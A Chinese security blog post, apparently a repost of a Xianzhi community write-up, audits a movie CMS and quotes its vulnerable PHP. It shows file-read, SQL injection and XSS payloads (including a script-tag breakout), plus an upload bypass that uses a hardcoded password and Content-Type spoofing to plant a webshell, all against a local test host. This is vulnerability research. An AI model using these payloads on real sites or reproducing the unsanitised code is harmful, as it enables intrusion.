某电影cms审计处体验

2019-05-09 约 1744 字 预计阅读 4 分钟

声明:本文 【某电影cms审计处体验】 由作者 threst 于 2019-05-09 08:22:00 首发 先知社区 曾经 浏览数 203 次

感谢 threst 的辛苦付出!

最近在secquan看到皮师傅写的代码审计,觉得还阔以,下载源码下来看看,审计了一下午,也发现了几个辣鸡漏洞,写下文章,记录下第一次代码审计。

文件读取(鸡肋)

like.php

位置:data/like.php

关键代码

$fang=$_GET['play'];
$jmfang=base64_decode($fang);
$like=file_get_contents($jmfang);
$likezz="/<ul class='s-guess-list g-clear js-list' data-block='tj-guess' monitor-desc=\"猜你喜欢\">(.*?)<\/ul>/is";
$kikez1="/ <img src=\"(.*?)\" data-src='(.*?)'>
            <\/a>
            <div class='s-guess-right'>
                <p class='title'><a href='(.*?)' data-index=(.*?)>(.*?)<\/a><\/p>
            <\/div>
/is";

preg_match_all($likezz, $like,$likearr);
preg_match_all($kikez1, $likearr['1']['0'],$liketitle);
...........略.........

直接传play参数,然后读取

读取文件

可以读取只是没有显示,因为like.php中对于读取的文件会自己进行处理,按一定的格式进行输出。另外皮师傅发现的fenlei.php的文件读取更好,这里就不再说明了。

相同的还有play.php

<?php
error_reporting(0);
$player = base64_decode($_GET['play']);
$tvinfo = file_get_contents($player);

SQL

agent/index.php

<?php
require dirname(__FILE__) . "/dzsck.php";
if($_GET['type']=='Sell' and $_GET['id']!=''){  
   $cm->query("UPDATE d_kami SET km_sell=1 WHERE km_id ='".$_GET['id']."'");
   echo tiao("已复制好,可贴粘。", "index.php");
    exit();
  }
if($_GET['type']=='close' and $_GET['id']!=''){  
   $cm->query("UPDATE d_kami SET km_sell=0 WHERE km_id ='".$_GET['id']."'");
   echo backs("卡密取消复制成功!");
   exit();
  } 
$cm->query("SELECT * FROM d_adminuser where admin_id='" . $_SESSION["adminid"] . "' order by admin_id asc");  
$adminuser = $cm->fetch_array($rs);
$cm->query("SELECT * FROM d_kami where km_uid='" . $_SESSION["adminid"] . "' order by km_type asc");
$mypagesnum = $cm->db_num_rows();
?>
  ............略...............

可以看到id参数没有任何过滤带入sql语句,盘他,因为这里是代理的功能,所以要先注册一个代理,直接注册就行

Payload:http://192.168.0.100/tuana/agent/index.php?type=Sell&id=123

时间盲注

类似的注入还有

http://192.168.0.100/tuana/agent/index.php?type=close&id=123

XSS

payreturn.php

$orderid = $_GET["orderid"];
    //$isql="update d_ddcenter set dd_type=1 where dd_order='".$orderid."'";
    //$ddinfo=mysql_query($isql);
    //$cm->query("SELECT * FROM d_ddcenter where dd_order='" . $orderid . "'");
    //$row = $cm->fetch_array($rs);
    //$dd_adminid=$row['dd_adminid'];
    echo $orderid;
    $cm->query("SELECT * FROM d_ddcenter where dd_order='" . $orderid . "' order by dd_id desc");
    $km_number = $cm->fetch_array($rs);
    $cm->query("SELECT * FROM d_adminuser where admin_id='" . $km_number["dd_adminid"] . "'    ");
    $km_number3 = $cm->fetch_array($rs);
        if($km_number["dd_vip"]==1){
           if( $km_number3['admin_endtime']<time())$ddvip = $cm->query("UPDATE d_adminuser SET admin_endtime=".time()."+2678400,admin_level=1,admin_opentime='".$nowtime."' WHERE admin_id='" . $km_number["dd_adminid"] . "'");
           else $ddvip = $cm->query("UPDATE d_adminuser SET admin_endtime=admin_endtime+2678400,admin_level=1,admin_opentime='".$nowtime."' WHERE admin_id='" . $km_number["dd_adminid"] . "'");
            }
.............略....................

将传入的orderid参数直接输出,很明显的xss

XSS2

admin/edituser.php

<?php
require dirname(__FILE__) . "/dzsck.php";
if (($_GET["type"] == "edit") && $_POST) {
    $date = array("admin_aglevel" => $_POST["admin_aglevel"]);
    $updates = $cm->cmupdate($date, "admin_id='" . $_POST["id"] . "'", "d_adminuser");
 if($updates)
   {echo tiao("修改成功!", "edituser.php?id=" . $_POST["id"]);
   exit();
   }
   else{echo tiao("修改失败,请重新修改!", "edituser.php?id=" . $_POST["id"]);
   exit();
   } 
    }

这里POSTid没有任何处理就直接输出,看起来是个xss,那就试试

直接插入xss,发现并不行,代码直接变成这样了

<script type='text/javascript'>alert('修改成功!');location.replace('edituser.php?id=<script>alert(/xss/)</script>');</script>

仔细观察,发现edituser.php?id会把$_POST["id"]的内容直接连接,并且添加了一些其他的东西);</script>,像个办法绕过,尝试将POST的内容改成admin_aglevel=1&id=123</script>');<script>alert(/xss/)</script>('

成功xss

文件上传

跟进index.php看看,

<?php
if(is_array($_FILES["upfile"])){
$i=0;
if($_POST['pwd'] != $passwd){
    echo '<script>alert("��û��Ȩ��")</script>';
    exit;
}
while($i<count($_FILES["upfile"])){
if ($_SERVER['REQUEST_METHOD'] == 'POST')
{


if (!is_uploaded_file($_FILES["upfile"][tmp_name][$i]))
//�Ƿ�����ļ�
{
// echo $_FILES["upfile"][tmp_name][$i];
echo "<font color='red'>�ļ�Ԥ����</font>";
exit;
}
// echo $_FILES["upfile"][tmp_name][$i];
 $file = $_FILES["upfile"];
 if($max_file_size < $file["size"][$i])
 //����ļ���С
 {
 echo "<font color='red'>�ļ�̫��</font>";
 exit;
  }

if(!in_array($file["type"][$i], $uptypes))
//����ļ�����
{

 echo "<font color='red'>�����ϴ��������ļ���</font>";
 exit;
}

if(!file_exists($destination_folder))
if(!mkdir($destination_folder,0777,true)){
    echo "<font color='red'>������Ŀ¼ʧ��,���ֶ�������</a>";
}


$filename=$file["tmp_name"][$i];
$image_size = getimagesize($filename);
$pinfo=pathinfo($file["name"][$i]);
$ftype=$pinfo[extension];
$destination = $destination_folder.$i.time().".".$ftype;
if (file_exists($destination) && $overwrite != true)
{
     echo "<font color='red'>ͬ���ļ��Ѿ������ˣ�</a>";
     exit;
  }
echo $destination;
 if(!move_uploaded_file ($filename, $destination))
 {
   echo "<font color='red'>�ƶ��ļ�����</a>";
     exit;
  }

$pinfo=pathinfo($destination);
$fname=$pinfo[basename];

这里要注意的是,我们直接上传的话提示输入密码,还好密码就在inc/aik.config.php

tu_pass=123456

上传phpinfo试试,很明显,类型不正确,尝试修改Content-Type

上传成功!

试试一句话

成功getshell

关键词:[‘安全技术’, ‘漏洞分析’]


author

旭达网络

旭达网络技术博客,曾记录各种技术问题,一贴搞定.
本文采用知识共享署名 4.0 国际许可协议进行许可。

We notice you're using an adblocker. If you like our webite please keep us running by whitelisting this site in your ad blocker. We’re serving quality, related ads only. Thank you!

I've whitelisted your website.

Not now